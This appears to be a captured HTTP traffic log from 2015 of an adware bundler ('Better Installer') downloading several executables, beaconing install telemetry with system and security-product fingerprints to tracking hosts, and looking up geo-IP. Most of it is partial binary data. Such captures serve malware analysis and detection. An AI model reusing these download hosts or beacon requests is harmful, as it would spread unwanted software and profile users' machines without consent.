Range: bytes=11000000-11249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive



........k..!of5.Gu...b.(.U3.....R..K.....Rus..h. ........?.`.(n.,.1.i[
..x....N.a7p.D.o.....Q;..y.i|Xo....L...a|T...8H....y.....|.:hxP...W..$
[email protected]`.^S.W4.X...Qw>j........,.n2.s....j...X......
?.9R....;....&.!,..M..Pt>1....3'..b......X..Su!,.y...=u..y...Z-....
.1.a.....5;......?..k.{...y.....6,...V.Z..xP........."Q..v...j.h4.7...
..r...b....-..0.c.....Z......-..7.%wd...C..A...(.......\h.d...<.]./
..<|A^c>%N3..J....U./.a0....W-...3.....=.Xzb}..............._...
....J'..R.....%H...}7..B.:."'........0.x..o.Ja.._k^....-....;}.6s>w
........|...g.....t....S.V>.IG......{..$...&[q....L....mu..F..q...x
...._UF..R|..}"bA.....J"..b.{.L.0.dk..8...pE...-.$.ef.\\.p...&c..g]..~
......&.......4........J.....y.....].;.$.sT..Y~....#1..`.....E.3T0yA..
P2...I..A.....5.}.t..8../[email protected].|o..[.........:.[..'0 .....K...
...r.6....{......`..o................#.a%.P..Mb|"..3}.f......"F.......
a/D~....y...47D<PH.bu.(&..C....O....J_...xm..x..~c..\.S..{R$E..}wf.
..y.3........e./.8.Grac..v...T..HQ'..Z.......?...f.....G.Y.[..b(.uo...
 [email protected]}C=...`.R.".#.)1q..3.X...x.../.P.|..D.)N.1|.
.....p.....-`...........!T..I../..7.n.N..NeM.iv..*..sL..~<}..Z9G;..
..,.Ev............!..sY..P.E.gm*K...{....[....eU...4e4...22. .5..NH.W,
wGD.&4......5..5T.-c..).5..?......S...M,...1.3...(U!u.l4N...i!P&.Q.(0.
U.;.5..nN.s........w...4......]..F.F.n.(....-...;.....9....6.Ve9.)z.F.
@o.'j..c.R=...V.....m0.([.V .8..x.V...@.....\.c..T....GG?..o?.=..swp..
v..",c......&.....=6.8?J..G.y`[email protected]`y.9h.(mD.z..,yL....f^..}m;D.
<<< skipped >>>


GET /home/smt_istartsurf.exe HTTP/1.1
Range: bytes=167832-335664
User-Agent: Better Installer(Mozilla)
Host: VVV.girlliuxiaowei.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Server: nginx
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Type: application/octet-stream
Content-Length: 167833
Last-Modified: Wed, 15 Apr 2015 07:16:46 GMT
Connection: keep-alive
Expires: Tue, 21 Apr 2015 23:35:16 GMT
Cache-Control: max-age=259200
Content-Range: bytes 167832-335664/671328
...}..u..x&.........._.....].V.u...u..[&..........^........u......Y...
.#.....V.;.t.3.^]...U...}..u...&..........^.....]..E...t.j..p..0.u....
.....].j.h..H..9z...e..3..u........u...%.........l^...........]....t..
[email protected]...@u..}..G.=....v....}.....u.V.....Y.e..V.....V.....YY.f..
....N....t.....F.j._.-.E...u W..#..Y..u.....H..M.....N..............N.
.~..F....f...E...........E...y....u..{...Y...U...=..H..u..lx...u...v..
h......s..YY][email protected]
..u..6.<.@[email protected][email protected][email protected][email protected]....
u.j..S...Y.......u.j..B...Y.3....u........y.j...u..Y..TpG....I........
.H........y.j...u..Y.......y.j..~u..Yj..Us..Y;.t.P.ku..Y.R....E..t...M
...j.YQPVh..@..|....E.9u.u.P..t....u.....E......M.PQ.....YY..e..E..E..
}..u.P..t....t...E......E...w...............U.... .E.VWj.Y..vG..}....E
..E._.E.^[email protected]$.......t$.......
tN......u........$......$..........~.....3.........t..A...t2..t$.....t
......t....A..L$. ...A..L$. ...A..L$. ...A..L$. .......U..WV.u..M..}..
.....;.v.;.............r..=..I..t.WV......;.^_u...I........u..........
r)...$...B...........r.......$.$.B..$. .B...$...B..4.B.`.B...B.#......
F..G..F.....G..........r....$...B..I.#......F.....G..........r....$...
B..#.................r....$...B..I...B...B...B...B...B...B...B...B..D.
..D...D...D...D...D...D...D...D...D...D...D...D...D..............$...B
... .B.(.B.4.B.H.B..E.^_........E.^_........F..G..E.^_...I......F..G..
F..G..E.^_....t1..|9.......u$.........r......$...B......$.\.B..I..
<<< skipped >>>


GET /t.ashx?e=IwLHwtP2rDe9KEnyTrgYNDpM WXU2ev5jA5kVqVgWdAgLxC0aXqYrYyox39H7ctI2j/LgkcsObQY7r2o/YNuRFi2s6XsF8NY17e6nA3xYScE8SFHLIEPsM3UKcKGG9ndxuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJc/JW5G9GpuGA== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xqjdaibxl-g48pastf.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=IwLHwtP2rDe9KEnyTrgYNDpM WXU2ev5jA5kVqVgWdAgLxC0aXqYrYyox39H7ctI2j/LgkcsObQY7r2o/YNuRFi2s6XsF8NY17e6nA3xYScE8SFHLIEPsM3UKcKGG9ndxuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJc/JW5G9GpuGA== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xqjdaibxl-g48pastf.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk....


GET /t.ashx?e=IwLHwtP2rDe9KEnyTrgYNDpM WXU2ev5jA5kVqVgWdAgLxC0aXqYrYyox39H7ctI2j/LgkcsObQY7r2o/YNuRFi2s6XsF8NY17e6nA3xYScE8SFHLIEPsM3UKcKGG9ndxuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJc/JW5G9GpuGA== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xqjdaibxl-g48pastf.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk..



GET /smt2b/all/hat/row/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.newinputinfoservice.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:36:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1429283461"
Last-Modified: Fri, 17 Apr 2015 15:11:01 GMT
Cache-Control: max-age=2154
Content-Length: 12513156
Content-Type: application/x-msdownload
X-HW: 1429400184.dop012.am4.t,1429400183.cds045.am4.c
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@.......................... 
......./........ ..............................p.......... C..........
......................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]...@....... [email protected]... C.
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>


GET /sd?is=sm HTTP/1.1
Range: bytes=196227-
User-Agent: Better Installer(Mozilla)
Host: install-cdn.theswiftrecord.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Pragma: no-cache
Content-Type: application/octet-stream
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SwiftRecordSetup.exe
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Cache-Control: private, max-age=86400
Expires: Sun, 19 Apr 2015 23:35:14 GMT
Date: Sat, 18 Apr 2015 23:35:14 GMT
Content-Range: bytes 196227-523271/523272
Content-Length: 327045
Connection: keep-alive
...v~t/..**[email protected]%-P.....0L.r....P8.C?k.......4!....tqQ.nJ.\.r.v.
.&k...}.9..t=;d...Fe0.....b.g.."S,......a..J0.Y:.....o..]...G..4U.Xu..
.L..x..F..8.(...C'...*`.i....9..K(..[.......!..<..3Z............,.g
. '...yO.......J-...;...._.|"..g.....jD">.........*W.l9.0....@ .C..
....hm.E.m.......j.&.V...r..t-e.JW.../Q..V.1n/n...Q.z.p }Sv...t..t....
.g5C:..&@........$\ ....i..7..C B..q..6%."..zg..3......../O...{..^.._.
[email protected].|i[9...qF0{.....-Mo'...p.N'....=..#........g.4.]...7....O&l
t;......Ag..y.....w....C.....0a.......Ui.B......]...X.X.".w=a.sa1.....
..I&..x....E_.a..K.1.~.`..p{...h....S....Pz./...G.a...O...[/......j2'y
.y.t..._.4.o.....!.......%.m..q..S...A&..*b>...C........D8...b5..=.
s.......xHc~9..5?$...g.c.]PG..m..............q....BG....|.A..Zs..;_. .
[email protected].}.YC...Y....Y..%m.3.^}.."
../..I.u.[...z..>.......y.-6<.wU..%0/..7qJ.n!......r....7b!.....
......P..{.6......0...oB...S0F...../..=}2i.e_/...........[.i.V.}..[..i
.1...... .....h.).-}.{..f...u...f'0.....%........t.4......R....M.....p
.,..E..A.o.u5b..n..&....u.<.(.(LK... .g.........#.>.O..B`.|..0.1
.?.......07....(5.'..P..d.!7...._o...<..v^&...._A3n[S.F.._..${V{...
.#,[..;..<.\n.._..uH...*.I..mN&Q...N#H.q.n.=.!...48.......SN..2.4'.
......g..6WY.D......._..W*.v..=.>[email protected].........|D9i/..y.|W@
...... .8..t...M....q..x..$P..i..?%$......j...z.C..@.,p.vW..!y..v.I...
.~"9...X>......NA....5j.E...q[.....Y...h...O=cS.fU..D.]..<....r.
.3f.....3..!x..[t..SO. ....u1.m{Z"..Jw....O*..SG*..?TYb......x.~..
<<< skipped >>>


GET /installer.gif?action=finished&LFMR=_ffDll_0&app=65743&appver=&ver=1_36_01_22&version_date=15-04-17&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C9FC24CEAAF94660B86494E2129E945CPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_43&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350029&asw=0&asw2=1082139141&asw3=-2147475456&asw4=34816&crtnm=na&procstarttime=1429400187&procruntime=10&rnd=1429400197 HTTP/1.1
Host: stats.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: /EwDyj DU9MYYZ o1fJK1GTfiWxVZK fnWbGS26fQ5zINgFXc8P8UumBWS4kYn2U
x-amz-request-id: 32ED91069B3F2B0A
Date: Sat, 18 Apr 2015 23:36:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:56 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /apps.gif?action=install&app=65743&appver=&ver=1_36_01_22&version_date=15-04-17&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C9FC24CEAAF94660B86494E2129E945CPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1429400187&lifetime=0&silent=1&crtnm=na&procstarttime=1429400187&procruntime=10&rnd=1429400197 HTTP/1.1


Host: stats.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: qFN9dtw1MIFZXPNHMcp0Ai AtXHUCFI2N5aZJoxQMXCMdM5nMuRu5Pjpk BoAChG
x-amz-request-id: 3723F767FF6C4C5D
Date: Sat, 18 Apr 2015 23:36:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:45 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: qFN9dt
w1MIFZXPNHMcp0Ai AtXHUCFI2N5aZJoxQMXCMdM5nMuRu5Pjpk BoAChG..x-amz-requ
est-id: 3723F767FF6C4C5D..Date: Sat, 18 Apr 2015 23:36:38 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:45 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;..



POST /ocsp HTTP/1.1
Host: clients1.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 107
Content-Type: application/ocsp-request
Connection: keep-alive

0i0g0E0C0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./...1o..2. ..0.0... .....0...
0... .....0..
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 18 Apr 2015 23:35:51 GMT
Expires: Wed, 22 Apr 2015 23:35:51 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
0..........0..... .....0......0...0......J......h.v....b..Z./..2015041
8131041Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
..1o..2. ....20150418131041Z....20150425131041Z0...*.H..............f)
.X.:R...L.T.....H.n...<.J.&.....h.:*[email protected]......%.T.(Tl.."?v...#.
.;...95.T}3/\[email protected][email protected]"G....`..r...pfi.!.
.....2...e..........d.57U|...B....Y.....=,....=H.i.erbC..E....../..Of.
-.I...0u.xY.&../*.l...J...t...(Q...s.%..^...N.HTTP/1.1 200 OK..Content
-Type: application/ocsp-response..Date: Sat, 18 Apr 2015 23:35:51 GMT.
.Expires: Wed, 22 Apr 2015 23:35:51 GMT..Cache-Control: public, max-ag
e=345600..Server: ocsp_responder..Content-Length: 463..X-XSS-Protectio
n: 1; mode=block..X-Frame-Options: SAMEORIGIN..Alternate-Protocol: 80:
quic,p=1..0..........0..... .....0......0...0......J......h.v....b..Z.
/..20150418131041Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v.
...b..Z./...1o..2. ....20150418131041Z....20150425131041Z0...*.H......
........f).X.:R...L.T.....H.n...<.J.&.....h.:*[email protected]......%.T.(Tl
.."?v...#..;...95.T}3/\[email protected][email protected]"G....`..
r...pfi.!......2...e..........d.57U|...B....Y.....=,....=H.i.erbC..E..
..../..Of.-.I...0u.xY.&../*.l...J...t...(Q...s.%..^...N...
<<< skipped >>>


GET /mag/ytaiesmt_smtyc_setup.exe HTTP/1.1
Range: bytes=803956-
User-Agent: Better Installer(Mozilla)
Host: d2otsfra4otprh.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 482373
Connection: keep-alive
Cache-Control: no-cache
Last-Modified: Mon, 23 Mar 2015 09:00:36 GMT
Accept-Ranges: bytes
ETag: "b8e31d44765d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:22:42 GMT
Content-Range: bytes 803956-1286328/1286329
X-Cache: RefreshHit from cloudfront
Via: 1.1 d7876feb6aad13be77dcc3a0028488b5.cloudfront.net (CloudFront)
X-Amz-Cf-Id: I_fTFBWPP_WARY3xWON2zVDpeuBF5wB9J8K6rudu1Q7J6ioGKKBz_w==
.P........}..X..).....h,*S...iN. ..%.-W...#..;..'dI7.K..M....'.N.?(L..
#5.....L..f..b.Y....!......JP..{O....f.. L%btTB...bo...iN..iI..Su.....
..Y}>..s"..i mh....@._U].....G.>..9.^..`...."!......i(...s.&..g.
...7.p7.Q......H..^...@i6....|.,.".5`T;r$.;....K............>UX(...
N.X..,[email protected]=..J.a...w.'.{\A>.&...*....y\.GY..&.."r..y......
....!2.^..7..cE...'[....a)..wC..2.3....6t..u..1...6x.A.............2!.
W....Y;.N........v..a..f.x{f\O'LM....../=.....s..hXKE......;~t...P.=..
...|W.7........,..wC..m_...........w.......!..{Z.b..fu.pE.T&...eP".. 5
..4\J]........5V..........L..WyS...._....b.....4..u.czY..I...1..t.G.U.
....d}.moe)..Q...6X....X..ia...1....8`.n..O....-..."./^....QDW..P.....
.w.......w.Y^..[...2/q.s/i.....N..#.....fa....P.....r..%m.m.m.B...\k..
.p.j.g8t.....7./..vG........P.m.L.....?.<g....P....#'... ..D..7|n..
..#[.3.U..}....D...=..?. e.`...;p.. i..........<..wC._.51........Q.
"Ar....&.e......W....u6"...]..I.9.6...r....m. 9n...v."...*.X."..25...6
..-0..&3.I..&y6>.{.}m/[email protected]..
..8,{'L.bv..V:...V%[email protected]........!=Z...o...'. ....\..2%_$.B{.D.H.
...._.dD.....=Q..:z...Z.}RJF.o.W(.X!...<...].7.;9R....];=....GH..Fm
....A:'} .1........)...vJ...$7.;). 1..y......"v>.bF:.-50;#....,..9.
q..........iN...4.6uJj....F ..a.d...1..re........_.\p..m.ZX..9...t.[..
.D..`y.......p.kg.4....q1......U..W.:..>...<P....r..B. C.<).~
....K9..,.y... .. 4........~.0@>.BM...$hh...:7...P}0.A*TC...N..Ch..
O.T.L..U.n..B..@{.,*n..}N..fi..~..6..}C.Hg.......p.;.ZS.W.i..0...:
<<< skipped >>>


GET /v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.hp HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:35:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.21 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Sat, 18 Apr 20
15 23:35:48 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"1.21 ms","message":"store 1 ac
tion and 0 update "}..0..



GET /v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.nt.ff.tab HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:36:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.53 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Sat, 18 Apr 20
15 23:36:08 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.53 ms","message":"store 1 ac
tion and 0 update "}..0..



GET /install.ashx?e=hWfaA75NtHH85nz5m58wW/3K4Um6afGyh/JbJ35jG8NZxrddMpcl9iuIlCBhM10qy/hL8rqZ RaEgBvOe8 r0o/iiYZxylfDjKjHf0fty0gJvLuonclT9KsmG/QcpI3t8jaU320NFtWR2G31gFuf02hbuYqdnYR4elHMzi3I9ndbsUN4BYD1D8brniShQ3GQtRzip5AcKg4rWxcpBkHhSQ3kCpSb73om1nmEvUc rydewhrFWYF5Tv0qJ78sIh84amSSgMHjLmQAkaiKC91AannFaQMUFf3agVhnL6oJP/krWxcpBkHhSQ3kCpSb73om1nmEvUc ryfLtaw9zNAybItGWMfwQWPTSZrRYQUgrCCNPc8M0MF2aRqGwFt9gDlur0z2m5iDPRGLrldSVYX6DDrXuhDjTe7cjgNUdiNhvarEQZWzelk5mfjLSd7YlIFWg0zysAorDwLYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW ax5eone962kYdPT9nrlrOwzThv/VXsFFUkiD//SLljTIUUNPzNqpdQ IQcLyoqcrddz3lZB7h1Z HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: wt94bf4ec-g48pastf.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Type: application/octet-stream
Content-Length: 2432
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
C.\.S...6....Cn.....~.....5. ..,....$1@.......,...~..]......~m...W0..(
O.G.....|[email protected].*.......2.r0....u`..... ..... J&l
t;..:?........0...(....._.....c<"..D.......h..i<"..D...hnJ.....8
/E......9..A .......,.#.x/D..EN|V..8.....(..Y.....RO.....pu3@[S......{
X.5..#...t....... t.....4.....(.5...... ..|.OB...=r...X...e?...:......
.....*......z ...e..F3.9.G....v$.t..Lr..?..Z.B[.|...FR#.S..rlD..i0u[.f
.I..Fy.Y......5....x!..."..fA..#.n.....M3.._.1..[d80)....{. . .v...i..
...'..*..........B.!q..7p...1..r.....3... [email protected].]....Z....L.. a4.
4.T...d..N..z.N(.....N.-...R{..I?~..6}.,.^B..\.^[email protected](..&>
;p.0..G......".......w..h.a...#....D.....3........."6e...5...vU..z..c.
...y~......&.K../..!...e.(..F..U.........$.i.....k....D....-........?.
......C.......S..M.6/7..U...j.............H3..E......vB.88.a....=.v'@.
.W8. ...x....1..8..n.<..~..`.......dH~........5. .9y..`.".x.m.-.8b&
lt;..^[email protected].!3F .4t.v.u.Z...8.......1..n.*U.<p....#z.W...o./.u..I
g*{8......u.Wk.iV.5..#....g.C.y....b..'... |....f.%.H...R..t5..iV.h...
.8bc.....9....qc<...P.5w..#.mI.....?. .e.."Q. }...-.H.Bju.\ZP..iJoZ
G..5j.)..l.........;...w..z....x.?lk... .|...{(.E.w.q..Cve. . 7...d.[.
...<s0.....].9....xl..l.&J-.RL......\P..-yX....T. .5..5.....c....m6
....<..Q.j.#.U0/.#...T..:[email protected]..%;.....V.<...._....-g....!.ea.
[email protected].].........{pjG,`].....Y.H.v..l.?..Ok...8..Zo.....
.....=.a.B......u8$....../..!...e.(..F..U.u.....".........k....D....-.
.......?.......C......J.{z.F...ja.S..q......'.pZ.Z.......B...... .
<<< skipped >>>


GET / HTTP/1.1
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:49 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Sat, 18
 Apr 2015 23:35:49 GMT..Connection: keep-alive..Content-Type: applicat
ion/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codenam
e Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..



GET /16669.ashx?e=EiBq 4UeDsX9yuFJumnxsu3zD2kP7r IQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 2F3CXDdsfBwVjr4IQgU6/17ym41MswgnBQC drCF7eFcz7 uAJ9xYcf1Z5o0mFOvr/vhPcFBsxkAjkJywGAYoQ8 KcWSiy /2tEQoG17P7tYpb spL69FcIA44xPc2qosLgx3 rkXj410HaaBVZzWyyyBfgdC/MPGdamvrUQZsSBJrpn5593i7JkPoDWmx/bJrdSyBxPRpgEPlcKBNGiF/021585MfhSi/zqB 0t3X1fUP3zrweiciP01Y5blnUF9RCwvFUhC5HWNosTONfWcc= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=462269, public, no-transform, must-revalidate
Last-Modified: Fri, 17 Apr 2015 08:00:00 GMT
Expires: Fri, 24 Apr 2015 08:00:00 GMT
Date: Sat, 18 Apr 2015 23:38:50 GMT
Connection: keep-alive
0..........0..... .....0......0...0......'.V.8.F.V....H....JW..2015041
7080000Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5......
....^[email protected]...*.H........
.....A..`.............Q.q..M....mq'.9.*..u..Y....TU..!T..J...i.Apu.q.e
,.9.v...D......i...-.;.a.....e..z.)Et....x..4\j..<.....B[.........3
......}..@<.6..:B"...^.....%.H.u4........{.B.M..].b....*..Q.8......
.._....C.fg.....Zs3.r....n|..t'..t..F...o....T.p...*3:..!...#0...0...0
..........r..?.*......y"..0...*.H........0..1.0...U....US1.0...U....Ve
riSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use a
t hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code S
igning 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0...
U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms o
f use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Clas
s 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0.......
......m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d...n
z(...V7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F*].
..*....{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."...
:.C.Q.i~rl..<..krS..8.B..o][email protected]...
U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.veri
sign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS inco
rp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U..
......0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...*.H
<<< skipped >>>


GET /home/smt_istartsurf.exe HTTP/1.1
Range: bytes=0-
User-Agent: Better Installer(Mozilla)
Host: VVV.girlliuxiaowei.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Server: nginx
Date: Sat, 18 Apr 2015 23:35:15 GMT
Content-Type: application/octet-stream
Content-Length: 671328
Last-Modified: Wed, 15 Apr 2015 07:16:46 GMT
Connection: keep-alive
Expires: Tue, 21 Apr 2015 23:35:15 GMT
Cache-Control: max-age=259200
Content-Range: bytes 0-671327/671328
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........*...D...D.
[email protected][email protected][email protected][email protected]...
[email protected]............
[email protected]......."....
@.......................................... ..............."..`.......
[email protected]................
...............text....P.......R.................. ..`.rdata...^...p..
.`...V..............@[email protected]...$O.......,[email protected].
....... ......................@[email protected]..................
@..B..................................................................
......................................................................
......................................................................
......................................................................
............................................U..j.h.NG.d.....P....T.H.3
